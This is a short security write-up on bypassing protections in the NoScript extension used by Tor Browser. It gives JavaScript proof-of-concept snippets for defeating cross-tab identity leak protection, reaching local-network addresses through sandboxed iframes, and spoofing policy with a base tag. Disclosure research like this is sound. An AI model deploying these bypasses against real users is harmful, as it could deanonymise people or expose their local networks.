Writeups

NoScript is a security browser extension installed by default on the Tor Browser that reduces the attack surface of visited websites such as by per site disabling JavaScript and blocking requests to the local area network. It also has cross-site protections such as checking the URL for reflected XSS and asking before opening cross-site popups to avoid timing attacks and other leaks via the opener (Firefox only).

Disabling JS works by setting the following CSP:

noscript-marker; script-src 'none'; object-src 'none'; media-src 'none'; font-src 'none'; script-src-elem 'none'; script-src-attr 'none'; worker-src 'none'

So, in order to bypass it you need to find somewhere the CSP is not enforced like this or a PDF.

Cross-tab Identity Leak Protection

Due to a flaw in cutting tab ties it did not think tabs where related when there was still a window reference.

async function bypassFirefox(url) {
  let win = open('about:blank');
  await new Promise((resolve) => setTimeout(resolve, 100));
  win.location.reload();
  await new Promise((resolve) => setTimeout(resolve, 100));
  win.location = url;
  return win;
}

And later… commit

let w = open();
w.eval('console.log("some attack")');
location = target;

And later… (Requires two user interactions)

w1 = open();
w2 = w1.open();
w1.close();
w2.location = target;

Like COOP this does not affect timing attacks on the first navigation.

LAN Protection

Sandboxed content uses the origin of ‘null’ which bypassed the protection.

let f = document.createElement('iframe');
f.srcdoc = '<img src="http://192.168.1.1/foo">';
f.sandbox = 'allow-scripts';
document.body.appendChild(f);

This was also expanded to top-level documents.

Policy spoofing

document.baseURI was used to determine the policy for about: and javascript: URLs this could be set to any origin using the html base tag. commit

<base href="https://www.example.com/" />